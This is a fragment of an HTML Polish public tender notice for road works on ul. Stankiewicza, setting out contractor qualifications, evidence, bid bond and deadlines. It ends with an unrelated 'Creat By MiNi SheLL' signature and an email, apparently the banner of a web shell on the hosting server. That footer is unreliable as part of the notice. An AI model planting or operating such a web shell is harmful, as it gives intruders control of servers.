skorzysta z Prawa Opcji, jeżeli w terminie wskazanym w pkt. 4.17 złoży Wykonawcy oświadczenie w formie pisemnej o skorzystaniu (uruchomieniu) Prawa Opcji.<br/>4.20.	Zamawiający nie jest zobligowany do skorzystania z Prawa Opcji. W przypadku nieskorzystania przez Zamawiającego z Prawa Opcji w terminie o jakim mowa w pkt. 4.17 powyżej, Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego.<br/>4.21.	Wykonawca zobowiązany jest rozpocząć wykonywanie Robót obejmujące Prawo Opcji najpóźniej w terminie 14 dni od dnia otrzymania oświadczenia o skorzystaniu z Prawa Opcji.<br/>4.22.	Skorzystanie z prawa opcji i jego realizacja przez Wykonawcę uprawnia go do otrzymania Wynagrodzenia o jakim mowa w ofercie i projekcie umowy.<br/>4.23.	Do Robót objętych prawem opcji stosuje się wszystkie postanowienia projektu umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">320 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	O uzyskanie zamówienia mogą ubiegać się Wykonawcy posiadający doświadczenie polegające na wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej:<br/>−	jednej roboty budowlanej o wartości robót brutto minimum 3 000 000,00 zł (trzy miliony złotych) polegającej na wykonaniu budowy, przebudowy lub remontu drogi lub ulicy o nawierzchni bitumicznej (z wyłączeniem remontów cząstkowych).<br/>Poprzez remont cząstkowy należy rozumieć zespół zabiegów technicznych, wykonywanych na bieżąco, związanych z usuwaniem uszkodzeń nawierzchni zagrażających bezpieczeństwu ruchu, jak również zabiegi obejmujące małe powierzchnie, hamujące proces powiększania się powstałych uszkodzeń.<br/>b)	O uzyskanie zamówienia mogą ubiegać się Wykonawcy dysponujący przynajmniej:<br/>-	jedną osobę, która będzie pełnić funkcję kierownika budowy nad realizacją zamierzenia zgodnie z wymogami art. 22 ustawy z dn. 7 lipca 1994 r. Prawo Budowlane. Wskazana osoba, która będzie pełnić funkcję kierownika budowy winna posiadać uprawnienia do kierowania robotami budowlanymi w specjalności drogowej.<br/>-	jedną osobę do pełnienia funkcji kierownika robót elektrycznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych nadane na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane.<br/>-	jedną osobę do pełnienia funkcji kierownika robót sanitarnych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych nadane na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane.<br/>-	jedną osobę do pełnienia funkcji kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych. Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, w zakresie sieci, instalacji i urządzeń telekomunikacyjnych nadane na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokumenty, oświadczenia lub podmiotowe środki dowodowe składane WRAZ Z OFERTĄ<br/>16.2.	Wykonawca składając ofertę, zobowiązany jest złożyć:<br/>16.2.1.	aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 ustawy (w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym), według wzoru stanowiącego załącznik do SWZ. – załącznik nr 4 do SWZ. <br/>16.2.2.	aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy (w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym), według wzoru stanowiącego załącznik do SWZ. – załącznik nr 5 do SWZ. <br/>16.2.3.	w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 16.2.2, i 16.2.3 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji. <br/>16.2.4.	w przypadku o którym mowa w art. 117 ust. 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy według wzoru stanowiącego załącznik do SWZ– załącznik nr 6 do SWZ.<br/>16.2.5.	w przypadku gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu należy załączyć zobowiązanie podmiotu udostępniającego zasoby, stosownie do art. 118 ust. 3 Pzp według wzoru stanowiącego załącznik do SWZ. – załącznik nr 7 do SWZ.<br/>16.2.6.	W przypadku, polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, wykonawca przedstawia wraz z oświadczeniem, o którym mowa w pkt 16.2.2, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu. <br/>16.2.7.	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do złożenia oferty (o ile dotyczy).<br/>Jeżeli pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia dokonuje mocodawca. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz. <br/>Cyfrowe odwzorowanie pełnomocnictwa nie może być uwierzytelnione przez pełnomocnika<br/>Uwaga: Powyższe dokumenty należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na podstawie art. 274 ust. 2 Pzp Zamawiający wymaga złożenia WRAZ Z OFERTĄ następujących podmiotowych środków dowodowych:<br/>16.3.	W celu potwierdzenia spełniania warunków udziału w postępowaniu zamawiający będzie żądał poniższych środków dowodowych:<br/>a)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane , z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (załącznik nr 8 do SWZ).<br/>b)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 9 do SWZ).<br/>c)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp (załącznik nr 10 do SWZ),</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 28.1.	Wykonawca jest zobowiązany do wniesienia wadium - w wysokości: 50 000,00 zł.<br/>28.2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>28.3.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy: <br/>28.3.1.	pieniądzu, przelewem na rachunek bankowy: BANK SPÓŁDZIELCZY W TRZEBIESZOWIE Nr 84 9206 1048 7103 0300 2000 0160; z dopiskiem: „Wadium budowa ul. Stankiewicza”. <br/>28.3.2.	gwarancjach bankowych; <br/>28.3.3.	gwarancjach ubezpieczeniowych; <br/>28.3.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>28.4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 29.3.2.–29.3.4. wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>28.5.	Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium. <br/>28.6.	Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu - dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że co innego wynika z przepisów prawa. <br/>28.7.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 28.3.1. rachunek bankowy Zamawiającego, najpóźniej przed upływem terminu składania ofert. <br/>28.8.	Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem. <br/>28.9.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 P.z.p. <br/>28.10.	Zamawiający zatrzyma wadium na zasadach określonych w art. 98 ust. 6 P.z.p. <br/>28.11.	W przypadku gwarancji bankowej lub ubezpieczeniowej zabezpieczającej ofertę konsorcjum wystarczające jest rodzajowe oznaczenie współwykonawców. <br/>28.12.	Dopuszczalne jest również wniesienie wadium w postaci gwarancji, w której jako zleceniodawcę wskazano tylko jednego ze współwykonawców, w takim przypadku w treści gwarancji winno być wskazanie, że „przyczyny leżące po stronie wykonawcy” (art. 98 ust. 6 pkt 1 i 3 Pzp) obejmują również działania i zaniechania ewentualnych i nieznanych gwarantowi współwykonawców <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy został określony w dokumentach zamówienia - załącznik nr 2 do SWZ projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0897980e-628c-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-24 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com